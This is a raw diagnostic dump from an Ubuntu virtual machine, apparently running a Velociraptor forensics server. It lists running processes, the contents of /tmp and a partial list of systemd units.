root         424  0.0  0.0      0     0 ?        S    11:09   0:00 [audit_prune_tree]
root         487  0.0  0.1 240040  6968 ?        Ssl  11:09   0:01 /usr/libexec/accounts-daemon
root         488  0.0  0.0   2816  1920 ?        Ss   11:09   0:00 /usr/sbin/acpid
avahi        491  0.0  0.0   7632  3712 ?        Ss   11:09   0:01 avahi-daemon: running [ubuntu-28.local]
root         493  0.0  0.0   9496  2688 ?        Ss   11:09   0:00 /usr/sbin/cron -f -P
message+     494  0.0  0.1  11120  6656 ?        Ss   11:09   0:02 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root         496  0.0  0.2 261108 14912 ?        Ssl  11:09   0:04 /usr/sbin/NetworkManager --no-daemon
root         502  0.0  0.0  82768  3328 ?        Ssl  11:09   0:01 /usr/sbin/irqbalance --foreground
root         506  0.0  0.2  41200 13824 ?        Ss   11:09   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root         508  0.0  0.1 243096 10256 ?        Ssl  11:09   0:02 /usr/libexec/polkitd --no-debug
root         509  0.0  0.0 240068  5888 ?        Ssl  11:09   0:00 /usr/libexec/power-profiles-daemon
syslog       511  0.0  0.0 222404  4480 ?        Ssl  11:09   0:00 /usr/sbin/rsyslogd -n -iNONE
root         515  0.0  0.3 1849620 23012 ?       Ssl  11:09   0:06 /usr/lib/snapd/snapd
root         517  0.0  0.0 236380  5760 ?        Ssl  11:09   0:00 /usr/libexec/switcheroo-control
root         522  0.0  0.1  15400  6648 ?        Ss   11:09   0:00 /lib/systemd/systemd-logind
root         525  0.0  0.1 393080 10072 ?        Ssl  11:09   0:00 /usr/libexec/udisks2/udisksd
root         528  0.0  0.0  16504  4352 ?        Ss   11:09   0:00 /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
avahi        551  0.0  0.0   7444  1408 ?        S    11:09   0:00 avahi-daemon: chroot helper
root         580  0.0  0.1 317972  7736 ?        Ssl  11:09   0:00 /usr/sbin/ModemManager
root         593  0.0  0.4 6166548 27960 ?       Ssl  11:09   0:13 /usr/local/bin/velociraptor --config /root/server.config.yaml frontend -v
root         614  0.0  0.2 118192 15872 ?        Ssl  11:09   0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root         641  0.0  0.1 241344  7808 ?        Ssl  11:09   0:00 /usr/sbin/gdm3
root         645  0.0  0.1  73028 10752 ?        Ss   11:09   0:00 /usr/sbin/cupsd -l
root         691  0.0  0.1 172068  9856 ?        Ssl  11:09   0:00 /usr/sbin/cups-browsed
kernoops     707  0.0  0.0  13092  2456 ?        Ss   11:09   0:00 /usr/sbin/kerneloops --test
kernoops     712  0.0  0.0  13092  2324 ?        Ss   11:09   0:00 /usr/sbin/kerneloops
root         721  0.2  0.8 6168788 53052 ?       Sl   11:09   1:25 /usr/local/bin/velociraptor --config /root/server.config.yaml frontend -v
rtkit        745  0.0  0.0 154004  3328 ?        SNsl 11:09   0:00 /usr/libexec/rtkit-daemon
root         968  0.0  0.1 242228  7296 ?        Ssl  11:09   0:00 /usr/libexec/upowerd
root         974  0.0  0.2 298380 15420 ?        Ssl  11:09   0:00 /usr/libexec/packagekitd
colord      1109  0.0  0.1 245376 10104 ?        Ssl  11:09   0:00 /usr/libexec/colord
root        1169  0.0  0.1 391920 10548 ?        Sl   11:09   0:00 gdm-session-worker [pam/gdm-password]
champus+    1173  0.0  0.1  17984 10240 ?        Ss   11:09   0:02 /lib/systemd/systemd --user
champus+    1174  0.0  0.0 169964  4316 ?        S    11:09   0:00 (sd-pam)
champus+    1180  0.0  0.0  39568  4480 ?        S<sl 11:09   0:00 /usr/bin/pipewire
champus+    1181  0.0  0.0  23456  4480 ?        Ssl  11:09   0:00 /usr/bin/pipewire-media-session
champus+    1182  0.0  0.2 2132512 16868 ?       S<sl 11:09   0:00 /usr/bin/pulseaudio --daemonize=no --log-target=journal
champus+    1193  0.0  0.1 240892  6428 ?        Sl   11:09   0:00 /usr/bin/gnome-keyring-daemon --daemonize --login
champus+    1201  0.0  0.0 162432  5504 tty2     Ssl+ 11:09   0:00 /usr/libexec/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --session=ubuntu
champus+    1203  0.2  1.5 656076 94788 tty2     Sl+  11:09   1:22 /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /run/user/1000/gdm/Xauthority -nolisten tcp -background none -noreset -keeptty -novtswitch -verbose 3
champus+    1214  0.0  0.1  10320  6528 ?        Ss   11:09   0:02 /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
champus+    1215  0.0  0.1 612836  6784 ?        Ssl  11:09   0:00 /usr/libexec/xdg-document-portal
champus+    1218  0.0  0.0 236156  5504 ?        Ssl  11:09   0:00 /usr/libexec/xdg-permission-store
root        1224  0.0  0.0   2796  1792 ?        Ss   11:09   0:00 fusermount3 -o rw,nosuid,nodev,fsname=portal,auto_unmount,subtype=portal -- /run/user/1000/doc
champus+    1252  0.0  0.2 223044 12544 tty2     Sl+  11:09   0:00 /usr/libexec/gnome-session-binary --session=ubuntu
champus+    1341  0.0  0.1 309728  7296 ?        Ssl  11:09   0:00 /usr/libexec/at-spi-bus-launcher
champus+    1347  0.0  0.0   8564  4352 ?        S    11:09   0:00 /usr/bin/dbus-daemon --config-file=/usr/share/defaults/at-spi2/accessibility.conf --nofork --print-address 11 --address=unix:path=/run/user/1000/at-spi/bus_1
champus+    1390  0.0  0.0  91912  4736 ?        Ssl  11:09   0:00 /usr/libexec/gnome-session-ctl --monitor
champus+    1406  0.0  0.1 240648  6656 ?        Ssl  11:09   0:00 /usr/libexec/gvfsd
champus+    1418  0.0  0.0 380896  5888 ?        Sl   11:09   0:00 /usr/libexec/gvfsd-fuse /run/user/1000/gvfs -f
champus+    1423  0.0  0.2 519128 12672 ?        Ssl  11:09   0:00 /usr/libexec/gnome-session-binary --systemd-service --session=ubuntu
champus+    1468  1.4  4.7 4242500 286388 ?      Ssl  11:09   7:35 /usr/bin/gnome-shell
champus+    1516  0.0  0.2 583040 17024 ?        Sl   11:09   0:00 /usr/libexec/gnome-shell-calendar-server
champus+    1522  0.0  0.3 1072140 21504 ?       Ssl  11:09   0:00 /usr/libexec/evolution-source-registry
champus+    1530  0.0  0.4 597216 27264 ?        Sl   11:09   0:00 /usr/libexec/goa-daemon
champus+    1533  0.0  0.4 840468 24960 ?        Ssl  11:09   0:00 /usr/libexec/evolution-calendar-factory
champus+    1542  0.0  0.1 338404 11136 ?        Sl   11:09   0:00 /usr/libexec/goa-identity-service
champus+    1543  0.0  0.1 315892  9216 ?        Ssl  11:09   0:00 /usr/libexec/gvfs-udisks2-volume-monitor
champus+    1553  0.0  0.1 315212  6784 ?        Ssl  11:09   0:02 /usr/libexec/gvfs-afc-volume-monitor
champus+    1561  0.0  0.0 236460  5760 ?        Ssl  11:09   0:00 /usr/libexec/gvfs-mtp-volume-monitor
champus+    1563  0.0  0.0 156940  5376 ?        Ssl  11:09   0:00 /usr/libexec/dconf-service
champus+    1572  0.0  0.3 672364 23680 ?        Ssl  11:09   0:00 /usr/libexec/evolution-addressbook-factory
champus+    1573  0.0  0.0 236636  6016 ?        Ssl  11:09   0:00 /usr/libexec/gvfs-goa-volume-monitor
champus+    1577  0.0  0.1 237416  6144 ?        Ssl  11:09   0:00 /usr/libexec/gvfs-gphoto2-volume-monitor
champus+    1594  0.0  0.1 314868  7680 ?        Sl   11:09   0:00 /usr/libexec/gvfsd-trash --spawner :1.19 /org/gtk/gvfs/exec_spaw/0
champus+    1603  0.0  0.3 2599500 21508 ?       Sl   11:09   0:00 /usr/bin/gjs /usr/share/gnome-shell/org.gnome.Shell.Notifications
champus+    1606  0.0  0.1 162756  7040 ?        Sl   11:09   0:00 /usr/libexec/at-spi2-registryd --use-gnome-session
champus+    1618  0.0  0.0   2892  1664 ?        Ss   11:09   0:00 sh -c /usr/bin/ibus-daemon --panel disable $([ "$XDG_SESSION_TYPE" = "x11" ] && echo "--xim")
champus+    1619  0.0  0.0 310392  5760 ?        Ssl  11:09   0:00 /usr/libexec/gsd-a11y-settings
champus+    1622  0.0  0.1 315500  8484 ?        Sl   11:09   0:19 /usr/bin/ibus-daemon --panel disable --xim
champus+    1624  0.0  0.3 537204 19428 ?        Ssl  11:09   0:00 /usr/libexec/gsd-color
champus+    1630  0.0  0.1 375436 11520 ?        Ssl  11:09   0:00 /usr/libexec/gsd-datetime
champus+    1633  0.0  0.1 312080  7040 ?        Ssl  11:09   0:01 /usr/libexec/gsd-housekeeping
champus+    1634  0.0  0.2 341424 16108 ?        Ssl  11:09   0:00 /usr/libexec/gsd-keyboard
champus+    1638  0.0  0.3 717624 19908 ?        Ssl  11:09   0:00 /usr/libexec/gsd-media-keys
champus+    1640  0.0  0.3 525040 19320 ?        Ssl  11:09   0:00 /usr/libexec/gsd-power
champus+    1642  0.0  0.1 249872  9344 ?        Ssl  11:09   0:00 /usr/libexec/gsd-print-notifications
champus+    1643  0.0  0.1 232272  6784 ?        Sl   11:09   0:00 /usr/libexec/gsd-disk-utility-notify
champus+    1644  0.0  0.0 457856  5888 ?        Ssl  11:09   0:00 /usr/libexec/gsd-rfkill
champus+    1646  0.0  0.0 236292  5504 ?        Ssl  11:09   0:00 /usr/libexec/gsd-screensaver-proxy
champus+    1649  0.0  0.1 465780  8192 ?        Ssl  11:09   0:00 /usr/libexec/gsd-sharing
champus+    1654  0.0  0.1 312272  6656 ?        Ssl  11:09   0:00 /usr/libexec/gsd-smartcard
champus+    1657  0.0  0.8 762828 52624 ?        Sl   11:09   0:00 /usr/libexec/evolution-data-server/evolution-alarm-notify
champus+    1661  0.0  0.1 319312  7808 ?        Ssl  11:09   0:00 /usr/libexec/gsd-sound
champus+    1665  0.0  0.2 268020 15892 ?        Ssl  11:09   0:00 /usr/libexec/gsd-wacom
champus+    1674  0.0  0.2 343292 18172 ?        Ssl  11:09   0:00 /usr/libexec/gsd-xsettings
champus+    1693  0.0  0.1 237312  6272 ?        Sl   11:09   0:00 /usr/libexec/ibus-dconf
champus+    1695  0.0  0.3 272488 21236 ?        Sl   11:09   0:04 /usr/libexec/ibus-extension-gtk3
champus+    1701  0.0  0.3 194160 20792 ?        Sl   11:09   0:00 /usr/libexec/ibus-x11 --kill-daemon
champus+    1706  0.0  0.1 237264  6400 ?        Sl   11:09   0:00 /usr/libexec/ibus-portal
champus+    1723  0.0  0.2 342364 13184 ?        Sl   11:09   0:00 /usr/libexec/gsd-printer
champus+    1733  0.0  0.0  39136  4224 ?        Ss   11:09   0:00 /snap/snapd-desktop-integration/315/usr/bin/snapd-desktop-integration
champus+    1745  0.0  0.1 623772 10496 ?        Ssl  11:09   0:01 /usr/libexec/xdg-desktop-portal
champus+    1765  0.0  0.8 1395884 54488 ?       Ssl  11:09   0:02 /usr/libexec/xdg-desktop-portal-gnome
champus+    1851  0.0  0.4 2534008 25116 ?       Sl   11:09   0:00 /usr/bin/gjs /usr/share/gnome-shell/org.gnome.ScreenSaver
champus+    1855  0.0  1.1 915040 68504 ?        Sl   11:09   0:00 /snap/snapd-desktop-integration/315/usr/bin/snapd-desktop-integration
champus+    1874  0.0  0.1 163612  6784 ?        Sl   11:09   0:06 /usr/libexec/ibus-engine-simple
champus+    1875  0.0  0.4 719576 30220 ?        SNsl 11:09   0:02 /usr/libexec/tracker-miner-fs-3
champus+    1926  0.0  0.2 342028 17920 ?        Ssl  11:09   0:00 /usr/libexec/xdg-desktop-portal-gtk
champus+    1962  0.0  0.0 163048  5760 ?        Ssl  11:09   0:00 /usr/libexec/gvfsd-metadata
champus+    1997  0.0  0.5 537936 33792 ?        Sl   11:10   0:02 update-notifier
champus+    3887  0.0  0.0  41316  2688 ?        S    11:16   0:00 podman
champus+    9538  0.0  1.0 1203740 62444 ?       Sl   11:40   0:05 /usr/bin/nautilus --gapplication-service
champus+    9568  3.6 11.7 12402388 715020 ?     Sl   11:42  18:06 /snap/firefox/7177/usr/lib/firefox/firefox
champus+    9638  0.0  0.0  21072  1696 ?        Sl   11:42   0:00 /snap/firefox/7177/usr/lib/firefox/crashhelper 9568 9 /tmp/ 11
champus+    9701  0.0  0.4 299784 24576 ?        S    11:42   0:00 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -ipcHandle 0 -signalPipe 1 -initialChannelId {54ef713b-a611-4e84-9f06-df63f5debaf4} -parentPid 9568 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 1 forkserver
champus+    9704  0.0  0.5 314180 36012 ?        Sl   11:42   0:00 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -parentBuildID 20251028100515 -prefsHandle 0:35969 -prefMapHandle 1:275119 -sandboxReporter 2 -chrootClient 3 -ipcHandle 4 -initialChannelId {232c0fd9-eff3-428d-9663-2763ef6a6ffb} -parentPid 9568 -crashReporter 5 -crashHelper 6 -appDir /snap/firefox/7177/usr/lib/firefox/browser 2 socket
champus+    9732  1.7  3.0 2547960 183704 ?      Sl   11:42   8:36 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:36141 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {2f719dbf-acd1-40e7-9c1f-45b26d269367} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 3 tab
champus+    9743  0.0  0.6 447228 39212 ?        Sl   11:42   0:00 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -parentBuildID 20251028100515 -prefsHandle 0:36141 -prefMapHandle 1:275119 -sandboxReporter 2 -chrootClient 3 -ipcHandle 4 -initialChannelId {83a6878e-195a-47e0-aa3f-fe4a5dfe3b7b} -parentPid 9568 -crashReporter 5 -crashHelper 6 -appDir /snap/firefox/7177/usr/lib/firefox/browser 4 rdd
champus+    9780  0.0  0.2 1765940 17792 ?       Sl   11:42   0:01 /usr/bin/snap userd
champus+    9938  0.0  1.3 2465008 81980 ?       Sl   11:42   0:01 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:45757 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {0e618765-94ab-4adb-96ee-e57c09db7d36} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 5 tab
champus+   10235  0.0  0.7 451848 44592 ?        Sl   11:42   0:00 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -parentBuildID 20251028100515 -sandboxingKind 0 -prefsHandle 0:46927 -prefMapHandle 1:275119 -sandboxReporter 2 -chrootClient 3 -ipcHandle 4 -initialChannelId {4c7ee706-7853-4c03-b832-7098687275bf} -parentPid 9568 -crashReporter 5 -crashHelper 6 -appDir /snap/firefox/7177/usr/lib/firefox/browser 6 utility
champus+   10244  1.2  9.9 3222128 603536 ?      Sl   11:42   6:10 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43481 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {22da36fa-b041-4214-bca0-96970a908d65} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 7 tab
champus+   10451  0.2  1.2 2454436 77580 ?       Sl   11:42   1:08 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43670 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {0846778f-6aeb-4339-8fc9-4ab5f998a29e} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 10 tab
champus+   10653  0.0  0.1 388688  7808 ?        Sl   11:43   0:00 /usr/libexec/gvfsd-network --spawner :1.19 /org/gtk/gvfs/exec_spaw/1
champus+   10667  0.0  0.1 316828  7808 ?        Sl   11:43   0:00 /usr/libexec/gvfsd-dnssd --spawner :1.19 /org/gtk/gvfs/exec_spaw/3
champus+   10741  0.0  1.0 2428568 65204 ?       Sl   11:47   0:27 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43779 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {7824f062-f181-48fd-85a5-9646d4287f73} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 14 tab
champus+   10748  0.0  1.0 2428568 65296 ?       Sl   11:47   0:27 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43779 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {31607e45-8b35-41da-9de7-799bfb0700ea} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 15 tab
champus+   10754  0.0  1.0 2428568 65088 ?       Sl   11:47   0:27 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43779 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {3a17b899-5005-4e4a-82f2-292b77770c09} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 16 tab
root       10934  0.0  0.0      0     0 ?        I    11:50   0:04 [kworker/1:1-events]
root       23306  0.0  0.0      0     0 ?        I    16:23   0:00 [kworker/u4:2]
root       24156  0.0  0.0      0     0 ?        I    16:53   0:01 [kworker/0:1-events]
root       24945  0.0  0.0      0     0 ?        I    18:38   0:00 [kworker/u5:1-events_power_efficient]
root       24992  0.0  0.0      0     0 ?        I    18:45   0:00 [kworker/u6:3-events_unbound]
root       25287  0.0  0.0      0     0 ?        I    19:35   0:00 [kworker/u6:1-flush-8:0]
root       25479  0.0  0.0      0     0 ?        I    19:44   0:00 [kworker/u6:2-events_unbound]
root       25485  0.0  0.0      0     0 ?        I    19:44   0:00 [kworker/u5:0-events_unbound]
champus+   25558  0.3  1.0 3059024 65360 ?       Sl   19:48   0:02 gjs /usr/share/gnome-shell/extensions/[email protected]/ding.js -E -P /usr/share/gnome-shell/extensions/[email protected] -M 0 -D 0:0:1280:800:1:27:0:0:0:0
champus+   25620  0.0  0.3  35940 18688 ?        S    19:49   0:00 /usr/bin/python3 /usr/bin/gnome-terminal --wait
champus+   25621  0.0  0.4 307540 27136 ?        Sl   19:49   0:00 /usr/bin/gnome-terminal.real --wait
champus+   25624  0.6  0.7 890588 48360 ?        Ssl  19:49   0:04 /usr/libexec/gnome-terminal-server
champus+   25647  0.0  0.0  11268  5504 pts/0    Ss   19:49   0:00 bash
root       25715  0.0  0.0      0     0 ?        I    19:50   0:00 [kworker/u5:2-flush-8:0]
root       25736  0.0  0.1  14348  6144 pts/0    S+   19:51   0:00 sudo -i
root       25737  0.0  0.0  14348  2512 pts/1    Ss   19:51   0:00 sudo -i
root       25738  0.0  0.0  11396  5504 pts/1    S    19:51   0:00 -bash
root       25808  0.0  0.0      0     0 ?        I    19:53   0:00 [kworker/1:0]
root       25833  0.0  0.0      0     0 ?        I    19:55   0:00 [kworker/0:2-events]
root       25836  0.0  0.0      0     0 ?        I    19:55   0:00 [kworker/u5:3-writeback]
root       25860  0.0  0.0      0     0 ?        I<   19:59   0:00 [kworker/R-tls-s]
root       25906  0.0  0.0      0     0 ?        I    20:01   0:00 [kworker/0:0-events]
champus+   25992  2.8  0.5 398960 31332 ?        SNsl 20:02   0:00 /usr/libexec/tracker-extract-3
root       25997  0.0  0.0  11396  3828 pts/1    S+   20:02   0:00 -bash
root       26004  0.0  0.0  12672  3456 pts/1    R+   20:02   0:00 ps aux
--------------------------------- List files:
total 68
drwxrwxrwt 17 root      root      4096 Nov  6 19:48 .
drwxr-xr-x 20 root      root      4096 Nov  6 20:01 ..
drwxrwxrwt  2 root      root      4096 Nov  6 11:09 .font-unix
-rw-------  1 champuser champuser    0 Nov  6 11:09 gdm3-config-err-4Hw2lH
drwxrwxrwt  2 root      root      4096 Nov  6 11:09 .ICE-unix
drwx------  4 root      root      4096 Nov  6 11:42 snap-private-tmp
drwx------  3 root      root      4096 Nov  6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-colord.service-hijiiC
drwx------  3 root      root      4096 Nov  6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-ModemManager.service-pubDje
drwx------  3 root      root      4096 Nov  6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-power-profiles-daemon.service-Msg1Aw
drwx------  3 root      root      4096 Nov  6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-switcheroo-control.service-vc6JUV
drwx------  3 root      root      4096 Nov  6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-systemd-logind.service-mRItdE
drwx------  3 root      root      4096 Nov  6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-systemd-oomd.service-ZSLhw3
drwx------  3 root      root      4096 Nov  6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-systemd-resolved.service-qTOjod
drwx------  3 root      root      4096 Nov  6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-systemd-timesyncd.service-d7gdD4
drwx------  3 root      root      4096 Nov  6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-upower.service-k0lchS
drwxrwxrwt  2 root      root      4096 Nov  6 11:09 .Test-unix
drwxrwxrwt  2 root      root      4096 Nov  6 11:09 .X11-unix
drwxrwxrwt  2 root      root      4096 Nov  6 11:09 .XIM-unix
total 12
drwxr-xr-x  3 root root 4096 Nov  1 13:49 .
drwxr-xr-x 20 root root 4096 Nov  6 20:01 ..
drwx------ 16 root root 4096 Oct  4 16:23 velociraptor
--------------------------------- List Update.custom
UNIT                                                                                                     LOAD   ACTIVE SUB       DESCRIPTION
proc-sys-fs-binfmt_misc.automount                                                                        loaded active running   Arbitrary Executable File Formats File System Automount Point
sys-devices-pci0000:00-0000:00:05.0-0000:01:01.0-virtio2-host0-target0:0:0-0:0:0:0-block-sda-sda1.device loaded active plugged   QEMU_HARDDISK 1
sys-devices-pci0000:00-0000:00:05.0-0000:01:01.0-virtio2-host0-target0:0:0-0:0:0:0-block-sda-sda2.device loaded active plugged   QEMU_HARDDISK EFI\x20System\x20Partition
sys-devices-pci0000:00-0000:00:05.0-0000:01:01.0-virtio2-host0-target0:0:0-0:0:0:0-block-sda-sda3.device loaded active plugged   QEMU_HARDDISK 3
sys-devices-pci0000:00-0000:00:05.0-0000:01:01.0-virtio2-host0-target0:0:0-0:0:0:0-block-sda.device      loaded active plugged   QEMU_HARDDISK
sys-devices-pci0000:00-0000:00:12.0-virtio1-net-ens18.device                                             loaded active plugged   Virtio network device
sys-devices-platform-serial8250-serial8250:0-serial8250:0.0-tty-ttyS0.device                             loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.0/tty/ttyS0
sys-devices-platform-serial8250-serial8250:0-serial8250:0.1-tty-ttyS1.device                             loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.1/tty/ttyS1
sys-devices-platform-serial8250-serial8250:0-serial8250:0.10-tty-ttyS10.device                           loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.10/tty/ttyS10
sys-devices-platform-serial8250-serial8250:0-serial8250:0.11-tty-ttyS11.device                           loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.11/tty/ttyS11
sys-devices-platform-serial8250-serial8250:0-serial8250:0.12-tty-ttyS12.device                           loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.12/tty/ttyS12
sys-devices-platform-serial8250-serial8250:0-serial8250:0.13-tty-ttyS13.device                           loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.13/tty/ttyS13
sys-devices-platform-serial8250-serial8250:0-serial8250:0.14-tty-ttyS14.device                           loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.14/tty/ttyS14
sys-devices-platform-serial8250-serial8250:0-serial8250:0.15-tty-ttyS15.device                           loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.15/tty/ttyS15
sys-devices-platform-serial8250-serial8250:0-serial8250:0.16-tty-ttyS16.device                           loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.16/tty/ttyS16
sys-devices-platform-serial8250-serial8250:0-serial8250:0.17-tty-ttyS17.device                           loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.17/tty/ttyS17
sys-devices-platform-serial8250-serial8250:0-serial8250:0.18-tty-ttyS18.device                           loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.18/tty/ttyS18
sys-devices-platform-serial8250-serial8250:0-serial8250:0.19-tty-ttyS19.device                           loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.19/tty/ttyS19
sys-devices-platform-serial8250-serial8250:0-serial8250:0.2-tty-ttyS2.device                             loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.2/tty/ttyS2
sys-devices-platform-serial8250-serial8250:0-serial8250:0.20-tty-ttyS20.device                           loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.20/tty/ttyS20
sys-devices-platform-serial8250-serial8250:0-serial8250:0.21-tty-ttyS21.device                           loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.21/tty/ttyS21
sys-devices-platform-serial8250-serial8250:0-serial8250:0.22-tty-ttyS22.device                           loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.22/tty/ttyS22
sys-devices-platform-serial8250-serial8250:0-serial8250:0.23-tty-ttyS23.device                           loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.23/tty/ttyS23
sys-devices-platform-serial8250-serial8250:0-serial8250:0.24-tty-ttyS24.device                           loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.24/tty/ttyS24
sys-devices-platform-serial8250-serial8250:0-serial8250:0.25-tty-ttyS25.device                           loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.25/tty/ttyS25
sys-devices-platform-serial8250-serial8250:0-serial8250:0.26-tty-ttyS26.device                           loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.26/tty/ttyS26
sys-devices-platform-serial8250-serial8250:0-serial8250:0.27-tty-ttyS27.device                           loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.27/tty/ttyS27
sys-devices-platform-serial8250-serial8250:0-serial8250:0.28-tty-ttyS28.device                           loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.28/tty/ttyS28
sys-devices-platform-serial8250-serial8250:0-serial8250:0.29-tty-ttyS29.device                           loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.29/tty/ttyS29
sys-devices-platform-serial8250-serial8250:0-serial8250:0.3-tty-ttyS3.device                             loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.3/tty/ttyS3
sys-devices-platform-serial8250-serial8250:0-serial8250:0.30-tty-ttyS30.device                           loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.30/tty/ttyS30
sys-devices-platform-serial8250-serial8250:0-serial8250:0.31-tty-ttyS31.device                           loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.31/tty/ttyS31
sys-devices-platform-serial8250-serial8250:0-serial8250:0.4-tty-ttyS4.device                             loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.4/tty/ttyS4
sys-devices-platform-serial8250-serial8250:0-serial8250:0.5-tty-ttyS5.device                             loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.5/tty/ttyS5
sys-devices-platform-serial8250-serial8250:0-serial8250:0.6-tty-ttyS6.device                             loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.6/tty/ttyS6
sys-devices-platform-serial8250-serial8250:0-serial8250:0.7-tty-ttyS7.device                             loaded active plugged   /sys/devices/platform/serial8250/serial8250:0/serial8250:0.7/tty/ttyS7
